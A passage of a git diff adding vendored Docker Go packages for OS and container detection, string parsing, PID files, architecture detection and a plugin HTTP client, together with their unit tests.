+func IsContainerized() (bool, error) { + b, err := ioutil.ReadFile(proc1Cgroup) + if err != nil { + return false, err + } + for _, line := range bytes.Split(b, []byte{'\n'}) { + if len(line) > 0 && !bytes.HasSuffix(line, []byte{'/'}) && !bytes.HasSuffix(line, []byte("init.scope")) { + return true, nil + } + } + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go new file mode 100644 index 0000000000..d08ad14860 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go @@ -0,0 +1,37 @@ +// +build solaris,cgo + +package operatingsystem + +/* +#include +*/ +import "C" + +import ( + "bytes" + "errors" + "io/ioutil" +) + +var etcOsRelease = "/etc/release" + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + b, err := ioutil.ReadFile(etcOsRelease) + if err != nil { + return "", err + } + if i := bytes.Index(b, []byte("\n")); i >= 0 { + b = bytes.Trim(b[:i], " ") + return string(b), nil + } + return "", errors.New("release not found") +} + +// IsContainerized returns true if we are running inside a container. +func IsContainerized() (bool, error) { + if C.getzoneid() != 0 { + return true, nil + } + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go new file mode 100644 index 0000000000..bc91c3c533 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go @@ -0,0 +1,25 @@ +// +build freebsd darwin + +package operatingsystem + +import ( + "errors" + "os/exec" +) + +// GetOperatingSystem gets the name of the current operating system. 
+func GetOperatingSystem() (string, error) { + cmd := exec.Command("uname", "-s") + osName, err := cmd.Output() + if err != nil { + return "", err + } + return string(osName), nil +} + +// IsContainerized returns true if we are running inside a container. +// No-op on FreeBSD and Darwin, always returns false. +func IsContainerized() (bool, error) { + // TODO: Implement jail detection for freeBSD + return false, errors.New("Cannot detect if we are in container") +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go new file mode 100644 index 0000000000..e7120c65c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go @@ -0,0 +1,247 @@ +// +build linux freebsd + +package operatingsystem + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestGetOperatingSystem(t *testing.T) { + var backup = etcOsRelease + + invalids := []struct { + content string + errorExpected string + }{ + { + `PRETTY_NAME=Source Mage GNU/Linux +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME needs to be enclosed by quotes if they have spaces: Source Mage GNU/Linux", + }, + { + `PRETTY_NAME="Ubuntu Linux +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME is invalid: invalid command line string", + }, + { + `PRETTY_NAME=Ubuntu' +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME is invalid: invalid command line string", + }, + { + `PRETTY_NAME' +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME needs to be enclosed by quotes if they have spaces: Ubuntu 14.04.LTS", + }, + } + + valids := []struct { + content string + expected string + }{ + { + `NAME="Ubuntu" +PRETTY_NAME_AGAIN="Ubuntu 14.04.LTS" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + 
"Linux", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + "Linux", + }, + { + `NAME=Gentoo +ID=gentoo +PRETTY_NAME="Gentoo/Linux" +ANSI_COLOR="1;32" +HOME_URL="http://www.gentoo.org/" +SUPPORT_URL="http://www.gentoo.org/main/en/support.xml" +BUG_REPORT_URL="https://bugs.gentoo.org/" +`, + "Gentoo/Linux", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +PRETTY_NAME="Ubuntu 14.04 LTS" +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + "Ubuntu 14.04 LTS", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +PRETTY_NAME='Ubuntu 14.04 LTS'`, + "Ubuntu 14.04 LTS", + }, + { + `PRETTY_NAME=Source +NAME="Source Mage"`, + "Source", + }, + { + `PRETTY_NAME=Source +PRETTY_NAME="Source Mage"`, + "Source Mage", + }, + } + + dir := os.TempDir() + etcOsRelease = filepath.Join(dir, "etcOsRelease") + + defer func() { + os.Remove(etcOsRelease) + etcOsRelease = backup + }() + + for _, elt := range invalids { + if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err == nil || err.Error() != elt.errorExpected { + t.Fatalf("Expected an error %q, got %q (err: %v)", elt.errorExpected, s, err) + } + } + + for _, elt := range valids { + if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err != nil || s != elt.expected { + t.Fatalf("Expected %q, got %q (err: %v)", elt.expected, s, err) + } + } +} + +func TestIsContainerized(t *testing.T) { + var ( + backup = proc1Cgroup + 
nonContainerizedProc1Cgroupsystemd226 = []byte(`9:memory:/init.scope +8:net_cls,net_prio:/ +7:cpuset:/ +6:freezer:/ +5:devices:/init.scope +4:blkio:/init.scope +3:cpu,cpuacct:/init.scope +2:perf_event:/ +1:name=systemd:/init.scope +`) + nonContainerizedProc1Cgroup = []byte(`14:name=systemd:/ +13:hugetlb:/ +12:net_prio:/ +11:perf_event:/ +10:bfqio:/ +9:blkio:/ +8:net_cls:/ +7:freezer:/ +6:devices:/ +5:memory:/ +4:cpuacct:/ +3:cpu:/ +2:cpuset:/ +`) + containerizedProc1Cgroup = []byte(`9:perf_event:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +8:blkio:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +7:net_cls:/ +6:freezer:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +5:devices:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +4:memory:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +3:cpuacct:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +2:cpu:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +1:cpuset:/`) + ) + + dir := os.TempDir() + proc1Cgroup = filepath.Join(dir, "proc1Cgroup") + + defer func() { + os.Remove(proc1Cgroup) + proc1Cgroup = backup + }() + + if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroup, 0600); err != nil { + t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err := IsContainerized() + if err != nil { + t.Fatal(err) + } + if inContainer { + t.Fatal("Wrongly assuming containerized") + } + + if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroupsystemd226, 0600); err != nil { + t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err = IsContainerized() + if err != nil { + t.Fatal(err) + } + if inContainer { + t.Fatal("Wrongly assuming containerized for systemd /init.scope cgroup layout") + } + + if err := ioutil.WriteFile(proc1Cgroup, containerizedProc1Cgroup, 0600); err != nil { + 
t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err = IsContainerized() + if err != nil { + t.Fatal(err) + } + if !inContainer { + t.Fatal("Wrongly assuming non-containerized") + } +} + +func TestOsReleaseFallback(t *testing.T) { + var backup = etcOsRelease + var altBackup = altOsRelease + dir := os.TempDir() + etcOsRelease = filepath.Join(dir, "etcOsRelease") + altOsRelease = filepath.Join(dir, "altOsRelease") + + defer func() { + os.Remove(dir) + etcOsRelease = backup + altOsRelease = altBackup + }() + content := `NAME=Gentoo +ID=gentoo +PRETTY_NAME="Gentoo/Linux" +ANSI_COLOR="1;32" +HOME_URL="http://www.gentoo.org/" +SUPPORT_URL="http://www.gentoo.org/main/en/support.xml" +BUG_REPORT_URL="https://bugs.gentoo.org/" +` + if err := ioutil.WriteFile(altOsRelease, []byte(content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err != nil || s != "Gentoo/Linux" { + t.Fatalf("Expected %q, got %q (err: %v)", "Gentoo/Linux", s, err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go new file mode 100644 index 0000000000..3c86b6af9c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go @@ -0,0 +1,49 @@ +package operatingsystem + +import ( + "syscall" + "unsafe" +) + +// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c +// for a similar sample + +// GetOperatingSystem gets the name of the current operating system. 
+func GetOperatingSystem() (string, error) { + + var h syscall.Handle + + // Default return value + ret := "Unknown Operating System" + + if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, + syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), + 0, + syscall.KEY_READ, + &h); err != nil { + return ret, err + } + defer syscall.RegCloseKey(h) + + var buf [1 << 10]uint16 + var typ uint32 + n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 + + if err := syscall.RegQueryValueEx(h, + syscall.StringToUTF16Ptr("ProductName"), + nil, + &typ, + (*byte)(unsafe.Pointer(&buf[0])), + &n); err != nil { + return ret, err + } + ret = syscall.UTF16ToString(buf[:]) + + return ret, nil +} + +// IsContainerized returns true if we are running inside a container. +// No-op on Windows, always returns false. +func IsContainerized() (bool, error) { + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go new file mode 100644 index 0000000000..acc897168f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go @@ -0,0 +1,69 @@ +// Package parsers provides helper functions to parse and validate different type +// of string. It can be hosts, unix addresses, tcp addresses, filters, kernel +// operating system versions. +package parsers + +import ( + "fmt" + "strconv" + "strings" +) + +// ParseKeyValueOpt parses and validates the specified string as a key/value pair (key=value) +func ParseKeyValueOpt(opt string) (string, string, error) { + parts := strings.SplitN(opt, "=", 2) + if len(parts) != 2 { + return "", "", fmt.Errorf("Unable to parse key/value option: %s", opt) + } + return strings.TrimSpace(parts[0]), strings.TrimSpace(parts[1]), nil +} + +// ParseUintList parses and validates the specified string as the value +// found in some cgroup file (e.g. `cpuset.cpus`, `cpuset.mems`), which could be +// one of the formats below. 
Note that duplicates are actually allowed in the +// input string. It returns a `map[int]bool` with available elements from `val` +// set to `true`. +// Supported formats: +// 7 +// 1-6 +// 0,3-4,7,8-10 +// 0-0,0,1-7 +// 03,1-3 <- this is gonna get parsed as [1,2,3] +// 3,2,1 +// 0-2,3,1 +func ParseUintList(val string) (map[int]bool, error) { + if val == "" { + return map[int]bool{}, nil + } + + availableInts := make(map[int]bool) + split := strings.Split(val, ",") + errInvalidFormat := fmt.Errorf("invalid format: %s", val) + + for _, r := range split { + if !strings.Contains(r, "-") { + v, err := strconv.Atoi(r) + if err != nil { + return nil, errInvalidFormat + } + availableInts[v] = true + } else { + split := strings.SplitN(r, "-", 2) + min, err := strconv.Atoi(split[0]) + if err != nil { + return nil, errInvalidFormat + } + max, err := strconv.Atoi(split[1]) + if err != nil { + return nil, errInvalidFormat + } + if max < min { + return nil, errInvalidFormat + } + for i := min; i <= max; i++ { + availableInts[i] = true + } + } + } + return availableInts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go new file mode 100644 index 0000000000..7f19e90279 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go @@ -0,0 +1,70 @@ +package parsers + +import ( + "reflect" + "testing" +) + +func TestParseKeyValueOpt(t *testing.T) { + invalids := map[string]string{ + "": "Unable to parse key/value option: ", + "key": "Unable to parse key/value option: key", + } + for invalid, expectedError := range invalids { + if _, _, err := ParseKeyValueOpt(invalid); err == nil || err.Error() != expectedError { + t.Fatalf("Expected error %v for %v, got %v", expectedError, invalid, err) + } + } + valids := map[string][]string{ + "key=value": {"key", "value"}, + " key = value ": {"key", "value"}, + "key=value1=value2": {"key", "value1=value2"}, + " key = value1 = value2 ": 
{"key", "value1 = value2"}, + } + for valid, expectedKeyValue := range valids { + key, value, err := ParseKeyValueOpt(valid) + if err != nil { + t.Fatal(err) + } + if key != expectedKeyValue[0] || value != expectedKeyValue[1] { + t.Fatalf("Expected {%v: %v} got {%v: %v}", expectedKeyValue[0], expectedKeyValue[1], key, value) + } + } +} + +func TestParseUintList(t *testing.T) { + valids := map[string]map[int]bool{ + "": {}, + "7": {7: true}, + "1-6": {1: true, 2: true, 3: true, 4: true, 5: true, 6: true}, + "0-7": {0: true, 1: true, 2: true, 3: true, 4: true, 5: true, 6: true, 7: true}, + "0,3-4,7,8-10": {0: true, 3: true, 4: true, 7: true, 8: true, 9: true, 10: true}, + "0-0,0,1-4": {0: true, 1: true, 2: true, 3: true, 4: true}, + "03,1-3": {1: true, 2: true, 3: true}, + "3,2,1": {1: true, 2: true, 3: true}, + "0-2,3,1": {0: true, 1: true, 2: true, 3: true}, + } + for k, v := range valids { + out, err := ParseUintList(k) + if err != nil { + t.Fatalf("Expected not to fail, got %v", err) + } + if !reflect.DeepEqual(out, v) { + t.Fatalf("Expected %v, got %v", v, out) + } + } + + invalids := []string{ + "this", + "1--", + "1-10,,10", + "10-1", + "-1", + "-1,0", + } + for _, v := range invalids { + if out, err := ParseUintList(v); err == nil { + t.Fatalf("Expected failure with %s but got %v", v, out) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go new file mode 100644 index 0000000000..d832fea7a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go @@ -0,0 +1,56 @@ +// Package pidfile provides structure and helper functions to create and remove +// PID file. A PID file is usually a file used to store the process ID of a +// running process. +package pidfile + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// PIDFile is a file used to store the process ID of a running process. 
+type PIDFile struct { + path string +} + +func checkPIDFileAlreadyExists(path string) error { + if pidByte, err := ioutil.ReadFile(path); err == nil { + pidString := strings.TrimSpace(string(pidByte)) + if pid, err := strconv.Atoi(pidString); err == nil { + if processExists(pid) { + return fmt.Errorf("pid file found, ensure docker is not running or delete %s", path) + } + } + } + return nil +} + +// New creates a PIDfile using the specified path. +func New(path string) (*PIDFile, error) { + if err := checkPIDFileAlreadyExists(path); err != nil { + return nil, err + } + // Note MkdirAll returns nil if a directory already exists + if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil { + return nil, err + } + if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil { + return nil, err + } + + return &PIDFile{path: path}, nil +} + +// Remove removes the PIDFile. +func (file PIDFile) Remove() error { + if err := os.Remove(file.path); err != nil { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go new file mode 100644 index 0000000000..5c1cd7ab85 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go @@ -0,0 +1,18 @@ +// +build darwin + +package pidfile + +import ( + "syscall" +) + +func processExists(pid int) bool { + // OS X does not have a proc filesystem. + // Use kill -0 pid to judge if the process exists. 
+ err := syscall.Kill(pid, 0) + if err != nil { + return false + } + + return true +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go new file mode 100644 index 0000000000..73e8af76db --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go @@ -0,0 +1,38 @@ +package pidfile + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestNewAndRemove(t *testing.T) { + dir, err := ioutil.TempDir(os.TempDir(), "test-pidfile") + if err != nil { + t.Fatal("Could not create test directory") + } + + path := filepath.Join(dir, "testfile") + file, err := New(path) + if err != nil { + t.Fatal("Could not create test file", err) + } + + _, err = New(path) + if err == nil { + t.Fatal("Test file creation not blocked") + } + + if err := file.Remove(); err != nil { + t.Fatal("Could not delete created test file") + } +} + +func TestRemoveInvalidPath(t *testing.T) { + file := PIDFile{path: filepath.Join("foo", "bar")} + + if err := file.Remove(); err == nil { + t.Fatal("Non-existing file doesn't give an error on delete") + } +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go new file mode 100644 index 0000000000..1bf5221e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go @@ -0,0 +1,16 @@ +// +build !windows,!darwin + +package pidfile + +import ( + "os" + "path/filepath" + "strconv" +) + +func processExists(pid int) bool { + if _, err := os.Stat(filepath.Join("/proc", strconv.Itoa(pid))); err == nil { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go new file mode 100644 index 0000000000..ae489c627a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go @@ -0,0 +1,23 @@ +package pidfile + 
+import "syscall" + +const ( + processQueryLimitedInformation = 0x1000 + + stillActive = 259 +) + +func processExists(pid int) bool { + h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) + if err != nil { + return false + } + var c uint32 + err = syscall.GetExitCodeProcess(h, &c) + syscall.Close(h) + if err != nil { + return c == stillActive + } + return true +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go new file mode 100644 index 0000000000..2cdc2c5918 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go @@ -0,0 +1,16 @@ +// Package platform provides helper function to get the runtime architecture +// for different platforms. +package platform + +import ( + "syscall" +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) +func runtimeArchitecture() (string, error) { + utsname := &syscall.Utsname{} + if err := syscall.Uname(utsname); err != nil { + return "", err + } + return charsToString(utsname.Machine), nil +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go new file mode 100644 index 0000000000..45bbcf1535 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go @@ -0,0 +1,20 @@ +// +build freebsd solaris darwin + +// Package platform provides helper function to get the runtime architecture +// for different platforms. +package platform + +import ( + "os/exec" + "strings" +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, i86pc, sun4v, ...) 
+func runtimeArchitecture() (string, error) { + cmd := exec.Command("/usr/bin/uname", "-m") + machine, err := cmd.Output() + if err != nil { + return "", err + } + return strings.TrimSpace(string(machine)), nil +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go new file mode 100644 index 0000000000..c5f684ddfa --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go @@ -0,0 +1,60 @@ +package platform + +import ( + "fmt" + "syscall" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + procGetSystemInfo = modkernel32.NewProc("GetSystemInfo") +) + +// see http://msdn.microsoft.com/en-us/library/windows/desktop/ms724958(v=vs.85).aspx +type systeminfo struct { + wProcessorArchitecture uint16 + wReserved uint16 + dwPageSize uint32 + lpMinimumApplicationAddress uintptr + lpMaximumApplicationAddress uintptr + dwActiveProcessorMask uintptr + dwNumberOfProcessors uint32 + dwProcessorType uint32 + dwAllocationGranularity uint32 + wProcessorLevel uint16 + wProcessorRevision uint16 +} + +// Constants +const ( + ProcessorArchitecture64 = 9 // PROCESSOR_ARCHITECTURE_AMD64 + ProcessorArchitectureIA64 = 6 // PROCESSOR_ARCHITECTURE_IA64 + ProcessorArchitecture32 = 0 // PROCESSOR_ARCHITECTURE_INTEL + ProcessorArchitectureArm = 5 // PROCESSOR_ARCHITECTURE_ARM +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) +func runtimeArchitecture() (string, error) { + var sysinfo systeminfo + syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0) + switch sysinfo.wProcessorArchitecture { + case ProcessorArchitecture64, ProcessorArchitectureIA64: + return "x86_64", nil + case ProcessorArchitecture32: + return "i686", nil + case ProcessorArchitectureArm: + return "arm", nil + default: + return "", fmt.Errorf("Unknown processor 
architecture") + } +} + +// NumProcs returns the number of processors on the system +func NumProcs() uint32 { + var sysinfo systeminfo + syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0) + return sysinfo.dwNumberOfProcessors +} diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go new file mode 100644 index 0000000000..e4b03122f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/platform.go @@ -0,0 +1,23 @@ +package platform + +import ( + "runtime" + + "github.com/Sirupsen/logrus" +) + +var ( + // Architecture holds the runtime architecture of the process. + Architecture string + // OSType holds the runtime operating system type (Linux, …) of the process. + OSType string +) + +func init() { + var err error + Architecture, err = runtimeArchitecture() + if err != nil { + logrus.Errorf("Could not read system architecture info: %v", err) + } + OSType = runtime.GOOS +} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go new file mode 100644 index 0000000000..5dcbadfdfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go @@ -0,0 +1,18 @@ +// +build linux,386 linux,amd64 linux,arm64 +// see golang's sources src/syscall/ztypes_linux_*.go that use int8 + +package platform + +// Convert the OS/ARCH-specific utsname.Machine to string +// given as an array of signed int8 +func charsToString(ca [65]int8) string { + s := make([]byte, len(ca)) + var lens int + for ; lens < len(ca); lens++ { + if ca[lens] == 0 { + break + } + s[lens] = uint8(ca[lens]) + } + return string(s[0:lens]) +} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go new file mode 100644 index 0000000000..c9875cf6e6 --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go @@ -0,0 +1,18 @@ +// +build linux,arm linux,ppc64 linux,ppc64le s390x +// see golang's sources src/syscall/ztypes_linux_*.go that use uint8 + +package platform + +// Convert the OS/ARCH-specific utsname.Machine to string +// given as an array of unsigned uint8 +func charsToString(ca [65]uint8) string { + s := make([]byte, len(ca)) + var lens int + for ; lens < len(ca); lens++ { + if ca[lens] == 0 { + break + } + s[lens] = ca[lens] + } + return string(s[0:lens]) +} diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go new file mode 100644 index 0000000000..dde5f66035 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go @@ -0,0 +1,35 @@ +package plugingetter + +import "github.com/docker/docker/pkg/plugins" + +const ( + // LOOKUP doesn't update RefCount + LOOKUP = 0 + // ACQUIRE increments RefCount + ACQUIRE = 1 + // RELEASE decrements RefCount + RELEASE = -1 +) + +// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins. +type CompatPlugin interface { + Client() *plugins.Client + Name() string + BasePath() string + IsV1() bool +} + +// CountedPlugin is a plugin which is reference counted. 
+type CountedPlugin interface { + Acquire() + Release() + CompatPlugin +} + +// PluginGetter is the interface implemented by Store +type PluginGetter interface { + Get(name, capability string, mode int) (CompatPlugin, error) + GetAllByCap(capability string) ([]CompatPlugin, error) + GetAllManagedPluginsByCap(capability string) []CompatPlugin + Handle(capability string, callback func(string, *plugins.Client)) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go new file mode 100644 index 0000000000..e8e730eb58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/client.go @@ -0,0 +1,205 @@ +package plugins + +import ( + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" + "net/url" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +const ( + defaultTimeOut = 30 +) + +func newTransport(addr string, tlsConfig *tlsconfig.Options) (transport.Transport, error) { + tr := &http.Transport{} + + if tlsConfig != nil { + c, err := tlsconfig.Client(*tlsConfig) + if err != nil { + return nil, err + } + tr.TLSClientConfig = c + } + + u, err := url.Parse(addr) + if err != nil { + return nil, err + } + socket := u.Host + if socket == "" { + // valid local socket addresses have the host empty. + socket = u.Path + } + if err := sockets.ConfigureTransport(tr, u.Scheme, socket); err != nil { + return nil, err + } + scheme := httpScheme(u) + + return transport.NewHTTPTransport(tr, scheme, socket), nil +} + +// NewClient creates a new plugin client (http). +func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) { + clientTransport, err := newTransport(addr, tlsConfig) + if err != nil { + return nil, err + } + return newClientWithTransport(clientTransport, 0), nil +} + +// NewClientWithTimeout creates a new plugin client (http). 
+func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) { + clientTransport, err := newTransport(addr, tlsConfig) + if err != nil { + return nil, err + } + return newClientWithTransport(clientTransport, timeoutInSecs), nil +} + +// newClientWithTransport creates a new plugin client with a given transport. +func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client { + return &Client{ + http: &http.Client{ + Transport: tr, + Timeout: time.Duration(timeoutInSecs) * time.Second, + }, + requestFactory: tr, + } +} + +// Client represents a plugin client. +type Client struct { + http *http.Client // http client to use + requestFactory transport.RequestFactory +} + +// Call calls the specified method with the specified arguments for the plugin. +// It will retry for 30 seconds if a failure occurs when calling. +func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error { + var buf bytes.Buffer + if args != nil { + if err := json.NewEncoder(&buf).Encode(args); err != nil { + return err + } + } + body, err := c.callWithRetry(serviceMethod, &buf, true) + if err != nil { + return err + } + defer body.Close() + if ret != nil { + if err := json.NewDecoder(body).Decode(&ret); err != nil { + logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err) + return err + } + } + return nil +} + +// Stream calls the specified method with the specified arguments for the plugin and returns the response body +func (c *Client) Stream(serviceMethod string, args interface{}) (io.ReadCloser, error) { + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(args); err != nil { + return nil, err + } + return c.callWithRetry(serviceMethod, &buf, true) +} + +// SendFile calls the specified method, and passes through the IO stream +func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{}) error { + body, err := c.callWithRetry(serviceMethod, data, true) + if err 
!= nil { + return err + } + defer body.Close() + if err := json.NewDecoder(body).Decode(&ret); err != nil { + logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err) + return err + } + return nil +} + +func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) { + req, err := c.requestFactory.NewRequest(serviceMethod, data) + if err != nil { + return nil, err + } + + var retries int + start := time.Now() + + for { + resp, err := c.http.Do(req) + if err != nil { + if !retry { + return nil, err + } + + timeOff := backoff(retries) + if abort(start, timeOff) { + return nil, err + } + retries++ + logrus.Warnf("Unable to connect to plugin: %s%s: %v, retrying in %v", req.URL.Host, req.URL.Path, err, timeOff) + time.Sleep(timeOff) + continue + } + + if resp.StatusCode != http.StatusOK { + b, err := ioutil.ReadAll(resp.Body) + resp.Body.Close() + if err != nil { + return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()} + } + + // Plugins' Response(s) should have an Err field indicating what went + // wrong. Try to unmarshal into ResponseErr. Otherwise fallback to just + // return the string(body) + type responseErr struct { + Err string + } + remoteErr := responseErr{} + if err := json.Unmarshal(b, &remoteErr); err == nil { + if remoteErr.Err != "" { + return nil, &statusError{resp.StatusCode, serviceMethod, remoteErr.Err} + } + } + // old way... 
